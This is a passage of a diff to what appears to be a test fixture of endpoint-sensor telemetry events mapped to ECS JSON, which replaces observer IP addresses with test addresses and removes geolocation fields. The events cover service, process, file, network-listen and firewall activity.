"{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1789338890\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"321210562584146513\",\"ContextTimeStamp\":\"1604855127.011\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"127.0.0.1\",\"LocalPort\":\"53\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"0.0.0.0\",\"RemotePort\":\"0\",\"aid\":\"ffffffffe5ff467b4f0c4fd41a4462bb\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkListenIP4\",\"id\":\"ffffffff-1111-11eb-ae74-065212970c5d\",\"name\":\"NetworkListenIP4MacV5\",\"timestamp\":\"1604855128936\"}", "created": "2020-11-08T17:05:28.936Z", "kind": "event", "action": "NetworkListenIP4", @@ -10270,21 +9071,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.134.213", - "vendor": "crowdstrike", - "ip": "208.216.134.213", "serial_number": "ffffffff59514ea68b4693ddfb9b6643", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:06:25.108Z", "ecs": { @@ -10295,18 +9087,18 @@ "user7" ], "hosts": [ - "208.216.134.213" + "67.43.156.13" ], "hash": [ "3338885535" ], "ip": [ - "208.216.134.213" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466331600Z", - "original": "{\"AuthenticationId\":\"999\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextTimeStamp\":\"1604855185.108\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\gpsvc.dll\",\"InterfaceGuid\":\"367ABB81-9844-35F1-AD32-98F038001003\",\"InterfaceVersion\":\"131072\",\"RpcClientProcessId\":\"219053851298\",\"RpcClientThreadId\":\"22047924482692\",\"RpcNestingLevel\":\"0\",\"RpcOpNum\":\"19\",\"ServiceDisplayName\":\"gpsvc\",\"TargetProcessId\":\"224116976578\",\"TargetThreadId\":\"22920092479704\",\"TokenType\":\"1\",\"UserName\":\"user7\",\"aid\":\"ffffffff59514ea68b4693ddfb9b6643\",\"aip\":\"208.216.134.213\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"HostedServiceStarted\",\"id\":\"ffffffff-1111-11eb-860c-0606af112d55\",\"name\":\"HostedServiceStartedV2\",\"timestamp\":\"1604855184068\"}", + "ingested": "2021-12-09T13:36:11.151308Z", + "original": "{\"AuthenticationId\":\"999\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextTimeStamp\":\"1604855185.108\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\gpsvc.dll\",\"InterfaceGuid\":\"367ABB81-9844-35F1-AD32-98F038001003\",\"InterfaceVersion\":\"131072\",\"RpcClientProcessId\":\"219053851298\",\"RpcClientThreadId\":\"22047924482692\",\"RpcNestingLevel\":\"0\",\"RpcOpNum\":\"19\",\"ServiceDisplayName\":\"gpsvc\",\"TargetProcessId\":\"224116976578\",\"TargetThreadId\":\"22920092479704\",\"TokenType\":\"1\",\"UserName\":\"user7\",\"aid\":\"ffffffff59514ea68b4693ddfb9b6643\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"HostedServiceStarted\",\"id\":\"ffffffff-1111-11eb-860c-0606af112d55\",\"name\":\"HostedServiceStartedV2\",\"timestamp\":\"1604855184068\"}", "created": "2020-11-08T17:06:24.068Z", "kind": "event", "action": "HostedServiceStarted", @@ -10354,21 +9146,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.134.213", - "vendor": "crowdstrike", - "ip": "208.216.134.213", "serial_number": "ffffffff2b5a4bf5afc6682595faa016", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:08:19.018Z", "ecs": { @@ -10376,18 +9159,18 @@ }, "related": { "hosts": [ - "208.216.134.213" + "67.43.156.13" ], "hash": [ "3338885535" ], "ip": [ - "208.216.134.213" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466338300Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextTimeStamp\":\"1604855299.018\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ServiceDisplayName\":\"wuauserv\",\"TargetProcessId\":\"661455186053\",\"TargetThreadId\":\"24238019995551\",\"aid\":\"ffffffff2b5a4bf5afc6682595faa016\",\"aip\":\"208.216.134.213\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"HostedServiceStopped\",\"id\":\"ffffffff-1111-11eb-9b11-0602a5689467\",\"name\":\"HostedServiceStoppedV1\",\"timestamp\":\"1604855302512\"}", + "ingested": "2021-12-09T13:36:11.151314400Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextTimeStamp\":\"1604855299.018\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ServiceDisplayName\":\"wuauserv\",\"TargetProcessId\":\"661455186053\",\"TargetThreadId\":\"24238019995551\",\"aid\":\"ffffffff2b5a4bf5afc6682595faa016\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"HostedServiceStopped\",\"id\":\"ffffffff-1111-11eb-9b11-0602a5689467\",\"name\":\"HostedServiceStoppedV1\",\"timestamp\":\"1604855302512\"}", "created": "2020-11-08T17:08:22.512Z", "kind": "event", "action": "HostedServiceStopped", @@ -10426,21 +9209,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.30.227.225", - "vendor": "crowdstrike", - "ip": "208.30.227.225", "serial_number": "ffffffff32cb4abc50bc133b31a69946", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:07:07.625Z", "file": { @@ -10458,18 +9232,18 @@ }, "related": { "hosts": [ - "208.30.227.225" + "67.43.156.14" ], "hash": [ "3338885535" ], "ip": [ - "208.30.227.225" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466345100Z", - "original": "{\"AuthenticationId\":\"3443175\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"1091372257857\",\"ContextThreadId\":\"36855848099771\",\"ContextTimeStamp\":\"1604855227.625\",\"DiskParentDeviceInstanceId\":\"PCI\\\\VEN_1179\\u0026DEV_0113\\u0026SUBSYS_00011179\\u0026REV_01\\\\4\\u00263ad42678\\u00260\\u002600E0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"f5ce07c6af67ec4ebe0846ff200bfc2f54f7020000002100\",\"FileObject\":\"18446603341701082336\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"0\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"288041\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\user12\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\\\TempState\\\\Downloads\\\\ex.pdf.8e41hf8.partial\",\"TokenType\":\"1\",\"aid\":\"ffffffff32cb4abc50bc133b31a69946\",\"aip\":\"208.30.227.225\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"PdfFileWritten\",\"id\":\"ffffffff-1111-11eb-baea-02dccfbb7779\",\"name\":\"PdfFileWrittenV11\",\"timestamp\":\"1604855264313\"}", + "ingested": "2021-12-09T13:36:11.151320700Z", + "original": "{\"AuthenticationId\":\"3443175\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"1091372257857\",\"ContextThreadId\":\"36855848099771\",\"ContextTimeStamp\":\"1604855227.625\",\"DiskParentDeviceInstanceId\":\"PCI\\\\VEN_1179\\u0026DEV_0113\\u0026SUBSYS_00011179\\u0026REV_01\\\\4\\u00263ad42678\\u00260\\u002600E0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"f5ce07c6af67ec4ebe0846ff200bfc2f54f7020000002100\",\"FileObject\":\"18446603341701082336\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"0\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"288041\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\user12\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\\\TempState\\\\Downloads\\\\ex.pdf.8e41hf8.partial\",\"TokenType\":\"1\",\"aid\":\"ffffffff32cb4abc50bc133b31a69946\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"PdfFileWritten\",\"id\":\"ffffffff-1111-11eb-baea-02dccfbb7779\",\"name\":\"PdfFileWrittenV11\",\"timestamp\":\"1604855264313\"}", "created": "2020-11-08T17:07:44.313Z", "kind": "event", "action": "PdfFileWritten", @@ -10531,21 +9305,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.239.110.158", - "vendor": "crowdstrike", - "ip": "208.239.110.158", "serial_number": "ffffffff655344736aca58d17fb570f0", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0012309.1" + "version": "1007.3.0012309.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:06:22.022Z", "ecs": { @@ -10553,7 +9318,7 @@ }, "related": { "hosts": [ - "208.239.110.158" + "67.43.156.14" ], "hash": [ "50d5fd1290d94d46acca0585311e74d5", @@ -10561,12 +9326,12 @@ "3998263252" ], "ip": [ - "208.239.110.158" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466352Z", - "original": "{\"AuthenticationId\":\"3783389\",\"CommandLine\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\backgroundTaskHost.exe\\\" -ServerName:App.AppXnme9zjyebb2xnyygh6q9ev6p5d234br2.mca\",\"ConfigBuild\":\"1007.3.0012309.1\",\"ConfigStateHash\":\"3998263252\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\backgroundTaskHost.exe\",\"ImageSubsystem\":\"2\",\"IntegrityLevel\":\"4096\",\"MD5HashData\":\"50d5fd1290d94d46acca0585311e74d5\",\"ParentAuthenticationId\":\"3783389\",\"ParentBaseFileName\":\"svchost.exe\",\"ParentProcessId\":\"2439558094566\",\"ProcessCreateFlags\":\"525332\",\"ProcessEndTime\":\"\",\"ProcessParameterFlags\":\"16385\",\"ProcessStartTime\":\"1604855181.648\",\"ProcessSxsFlags\":\"1600\",\"RawProcessId\":\"22272\",\"RpcClientProcessId\":\"2439558094566\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"b8e176fe76a1454a00c4af0f8bf8870650d9c33d3e333239a59445c5b35c9a37\",\"SessionId\":\"1\",\"SourceProcessId\":\"2439558094566\",\"SourceThreadId\":\"77538684027214\",\"Tags\":\"41, 12094627905582, 12094627906234\",\"TargetProcessId\":\"2450046082233\",\"TokenType\":\"2\",\"UserSid\":\"S-1-12-1-3697283754-1083485977-2164330645-2516515886\",\"WindowFlags\":\"128\",\"aid\":\"ffffffff655344736aca58d17fb570f0\",\"aip\":\"208.239.110.158\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-8462-02ade3b2f949\",\"name\":\"ProcessRollup2V18\",\"timestamp\":\"1604855182022\"}", + "ingested": "2021-12-09T13:36:11.151327Z", + "original": "{\"AuthenticationId\":\"3783389\",\"CommandLine\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\backgroundTaskHost.exe\\\" -ServerName:App.AppXnme9zjyebb2xnyygh6q9ev6p5d234br2.mca\",\"ConfigBuild\":\"1007.3.0012309.1\",\"ConfigStateHash\":\"3998263252\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\backgroundTaskHost.exe\",\"ImageSubsystem\":\"2\",\"IntegrityLevel\":\"4096\",\"MD5HashData\":\"50d5fd1290d94d46acca0585311e74d5\",\"ParentAuthenticationId\":\"3783389\",\"ParentBaseFileName\":\"svchost.exe\",\"ParentProcessId\":\"2439558094566\",\"ProcessCreateFlags\":\"525332\",\"ProcessEndTime\":\"\",\"ProcessParameterFlags\":\"16385\",\"ProcessStartTime\":\"1604855181.648\",\"ProcessSxsFlags\":\"1600\",\"RawProcessId\":\"22272\",\"RpcClientProcessId\":\"2439558094566\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"b8e176fe76a1454a00c4af0f8bf8870650d9c33d3e333239a59445c5b35c9a37\",\"SessionId\":\"1\",\"SourceProcessId\":\"2439558094566\",\"SourceThreadId\":\"77538684027214\",\"Tags\":\"41, 12094627905582, 12094627906234\",\"TargetProcessId\":\"2450046082233\",\"TokenType\":\"2\",\"UserSid\":\"S-1-12-1-3697283754-1083485977-2164330645-2516515886\",\"WindowFlags\":\"128\",\"aid\":\"ffffffff655344736aca58d17fb570f0\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-8462-02ade3b2f949\",\"name\":\"ProcessRollup2V18\",\"timestamp\":\"1604855182022\"}", "created": "2020-11-08T17:06:22.022Z", "kind": "event", "action": "ProcessRollup2", @@ -10619,24 +9384,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-IA", - "city_name": "Urbandale", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Iowa", - "location": { - "lon": -93.7255, - "lat": 41.6289 - } - }, - "address": "208.69.144.69", - "vendor": "crowdstrike", - "ip": "208.69.144.69", "serial_number": "ffffffff1f32487185fcde66a9dc0528", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0011104.1" + "version": "1007.4.0011104.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:09:15.388Z", "ecs": { @@ -10647,18 +9400,18 @@ "user8" ], "hosts": [ - "208.69.144.69" + "67.43.156.14" ], "hash": [ "1457965279" ], "ip": [ - "208.69.144.69" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466358800Z", - "original": "{\"AuthenticationId\":\"326190744\",\"AuthenticationUuid\":\"98467113-C771-4845-B71B-89B3CE9F93C9\",\"AuthenticationUuidAsString\":\"13714698-71C7-4548-B71B-89B3CE9F93C9\",\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1457965279\",\"Entitlements\":\"15\",\"UID\":\"326190744\",\"UserPrincipal\":\"user8@dom6\",\"UserSid\":\"S-1-5-21-3629339319-2376021926-2724479216-652382488\",\"aid\":\"ffffffff1f32487185fcde66a9dc0528\",\"aip\":\"208.69.144.69\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"UserIdentity\",\"id\":\"ffffffff-1111-11eb-b9b4-063e98f9b19b\",\"name\":\"UserIdentityMacV2\",\"timestamp\":\"1604855355388\"}", + "ingested": "2021-12-09T13:36:11.151333400Z", + "original": "{\"AuthenticationId\":\"326190744\",\"AuthenticationUuid\":\"98467113-C771-4845-B71B-89B3CE9F93C9\",\"AuthenticationUuidAsString\":\"13714698-71C7-4548-B71B-89B3CE9F93C9\",\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1457965279\",\"Entitlements\":\"15\",\"UID\":\"326190744\",\"UserPrincipal\":\"user8@dom6\",\"UserSid\":\"S-1-5-21-3629339319-2376021926-2724479216-652382488\",\"aid\":\"ffffffff1f32487185fcde66a9dc0528\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"UserIdentity\",\"id\":\"ffffffff-1111-11eb-b9b4-063e98f9b19b\",\"name\":\"UserIdentityMacV2\",\"timestamp\":\"1604855355388\"}", "created": "2020-11-08T17:09:15.388Z", "kind": "event", "action": "UserIdentity", @@ -10692,21 +9445,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.6.139.160", - "vendor": "crowdstrike", - "ip": "208.6.139.160", "serial_number": "ffffffffcdb543135e7fcdf8e5a8fbdb", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:05:57.555Z", "os": { @@ -10717,18 +9461,18 @@ }, "related": { "hosts": [ - "208.6.139.160" + "67.43.156.14" ], "hash": [ "1874387338" ], "ip": [ - "208.6.139.160" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466365600Z", - "original": "{\"BootArgs\":\" NOEXECUTE=OPTIN HYPERVISORLAUNCHTYPE=AUTO FVEBOOT=2125824 NOVGA\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1874387338\",\"EffectiveTransmissionClass\":\"0\",\"Entitlements\":\"15\",\"MachineDomain\":\"\",\"aid\":\"ffffffffcdb543135e7fcdf8e5a8fbdb\",\"aip\":\"208.6.139.160\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"HostInfo\",\"id\":\"ffffffff-1111-11eb-9bbd-061290dcd983\",\"name\":\"HostInfoV2\",\"timestamp\":\"1604855157555\"}", + "ingested": "2021-12-09T13:36:11.151339800Z", + "original": "{\"BootArgs\":\" NOEXECUTE=OPTIN HYPERVISORLAUNCHTYPE=AUTO FVEBOOT=2125824 NOVGA\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1874387338\",\"EffectiveTransmissionClass\":\"0\",\"Entitlements\":\"15\",\"MachineDomain\":\"\",\"aid\":\"ffffffffcdb543135e7fcdf8e5a8fbdb\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"HostInfo\",\"id\":\"ffffffff-1111-11eb-9bbd-061290dcd983\",\"name\":\"HostInfoV2\",\"timestamp\":\"1604855157555\"}", "created": "2020-11-08T17:05:57.555Z", "kind": "event", "action": "HostInfo", @@ -10778,21 +9522,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.134.196", - "vendor": "crowdstrike", - "ip": "208.216.134.196", "serial_number": "ffffffff16bf4c7bb5ad755a4722025c", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T15:57:10.593Z", "file": { @@ -10813,19 +9548,19 @@ "user9" ], "hosts": [ - "208.216.134.196" + "67.43.156.13" ], "hash": [ "2642284486" ], "ip": [ - "208.216.134.196" + "67.43.156.13" ] }, "event": { "action": "GenericFileWritten", - "ingested": "2021-11-22T09:23:55.466372400Z", - "original": "{\"AuthenticationId\":\"703298\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2642284486\",\"ContextProcessId\":\"1161025471861\",\"ContextThreadId\":\"34929528116709\",\"ContextTimeStamp\":\"1604851030.593\",\"DiskParentDeviceInstanceId\":\"USB\\\\VID_1058\\u0026PID_2621\\\\57583431453939315A4C5255\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"262fbc677256cf4c8d6c6a227285a072c06830873b000000\",\"FileObject\":\"18446664963104449168\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"1\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"517029\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume5\\\\01.png.tmp$$\",\"TokenType\":\"1\",\"UserName\":\"user9\",\"aid\":\"ffffffff16bf4c7bb5ad755a4722025c\",\"aip\":\"208.216.134.196\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"GenericFileWritten\",\"id\":\"ffffffff-1111-11eb-800a-06cecfd73923\",\"name\":\"GenericFileWrittenV11\",\"timestamp\":\"1604851031298\"}", + "ingested": "2021-12-09T13:36:11.151346200Z", + "original": "{\"AuthenticationId\":\"703298\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2642284486\",\"ContextProcessId\":\"1161025471861\",\"ContextThreadId\":\"34929528116709\",\"ContextTimeStamp\":\"1604851030.593\",\"DiskParentDeviceInstanceId\":\"USB\\\\VID_1058\\u0026PID_2621\\\\57583431453939315A4C5255\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"262fbc677256cf4c8d6c6a227285a072c06830873b000000\",\"FileObject\":\"18446664963104449168\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"1\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"517029\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume5\\\\01.png.tmp$$\",\"TokenType\":\"1\",\"UserName\":\"user9\",\"aid\":\"ffffffff16bf4c7bb5ad755a4722025c\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"GenericFileWritten\",\"id\":\"ffffffff-1111-11eb-800a-06cecfd73923\",\"name\":\"GenericFileWrittenV11\",\"timestamp\":\"1604851031298\"}", "id": "ffffffff-1111-11eb-800a-06cecfd73923", "created": "2020-11-08T15:57:11.298Z" }, @@ -10867,21 +9602,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.150.196", - "vendor": "crowdstrike", - "ip": "208.216.150.196", "serial_number": "ffffffff896b43725b83c79aa79959da", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T15:54:59.164Z", "ecs": { @@ -10889,18 +9615,18 @@ }, "related": { "hosts": [ - "208.216.150.196" + "67.43.156.13" ], "hash": [ "666346415" ], "ip": [ - "208.216.150.196" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466379200Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"666346415\",\"ContextProcessId\":\"1717987648455\",\"ContextThreadId\":\"55064470042288\",\"ContextTimeStamp\":\"1604850899.164\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"VolumeName\":\"\\\\Device\\\\HarddiskVolume27\",\"aid\":\"ffffffff896b43725b83c79aa79959da\",\"aip\":\"208.216.150.196\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"FsVolumeUnmounted\",\"id\":\"ffffffff-1111-11eb-9f70-0634389d9ea9\",\"name\":\"FsVolumeUnmountedV2\",\"timestamp\":\"1604850899812\"}", + "ingested": "2021-12-09T13:36:11.151387500Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"666346415\",\"ContextProcessId\":\"1717987648455\",\"ContextThreadId\":\"55064470042288\",\"ContextTimeStamp\":\"1604850899.164\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"VolumeName\":\"\\\\Device\\\\HarddiskVolume27\",\"aid\":\"ffffffff896b43725b83c79aa79959da\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"FsVolumeUnmounted\",\"id\":\"ffffffff-1111-11eb-9f70-0634389d9ea9\",\"name\":\"FsVolumeUnmountedV2\",\"timestamp\":\"1604850899812\"}", "created": "2020-11-08T15:54:59.812Z", "kind": "event", "action": "FsVolumeUnmounted", @@ -10936,21 +9662,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.193.200.164", - "vendor": "crowdstrike", - "ip": "208.193.200.164", "serial_number": "ffffffff899541b94b9adff8922aa70a", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0009906.1" + "version": "1007.4.0009906.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T15:58:18.548Z", "ecs": { @@ -10958,18 +9675,18 @@ }, "related": { "hosts": [ - "208.193.200.164" + "67.43.156.14" ], "hash": [ "3429017943" ], "ip": [ - "208.193.200.164" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466385900Z", - "original": "{\"ConfigBuild\":\"1007.4.0009906.1\",\"ConfigStateHash\":\"3429017943\",\"ContextProcessId\":\"66426035996442255\",\"ContextTimeStamp\":\"1604851098.548\",\"Entitlements\":\"15\",\"aid\":\"ffffffff899541b94b9adff8922aa70a\",\"aip\":\"208.193.200.164\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"FirewallDisabled\",\"id\":\"ffffffff-1111-11eb-9d4c-02f402df8c1f\",\"name\":\"FirewallDisabledMacV1\",\"timestamp\":\"1604851040625\"}", + "ingested": "2021-12-09T13:36:11.151393400Z", + "original": "{\"ConfigBuild\":\"1007.4.0009906.1\",\"ConfigStateHash\":\"3429017943\",\"ContextProcessId\":\"66426035996442255\",\"ContextTimeStamp\":\"1604851098.548\",\"Entitlements\":\"15\",\"aid\":\"ffffffff899541b94b9adff8922aa70a\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"FirewallDisabled\",\"id\":\"ffffffff-1111-11eb-9d4c-02f402df8c1f\",\"name\":\"FirewallDisabledMacV1\",\"timestamp\":\"1604851040625\"}", "created": "2020-11-08T15:57:20.625Z", "kind": "event", "action": "FirewallDisabled", @@ -10992,21 +9709,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.30.227.225", - "vendor": "crowdstrike", - "ip": "208.30.227.225", "serial_number": "fffffffffffaaaaaaaaabbbbbbbb", + "address": "67.43.156.14", "type": "agent", - "version": "6.31.14404.0" + "version": "6.31.14404.0", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "os": { "type": "macos", @@ -11017,11 +9725,11 @@ }, "related": { "hosts": [ - "208.30.227.225", + "67.43.156.14", "mac1" ], "ip": [ - "208.30.227.225" + "67.43.156.14" ] }, "host": { @@ -11035,8 +9743,8 @@ "hostname": "mac1" }, "event": { - "ingested": "2021-11-22T09:23:55.466392700Z", - "original": "{\"AgentLoadFlags\":\"0\",\"AgentLocalTime\":\"1636436839.9529998\",\"AgentTimeOffset\":\"125.319\",\"AgentVersion\":\"6.31.14404.0\",\"BiosManufacturer\":\"Apple 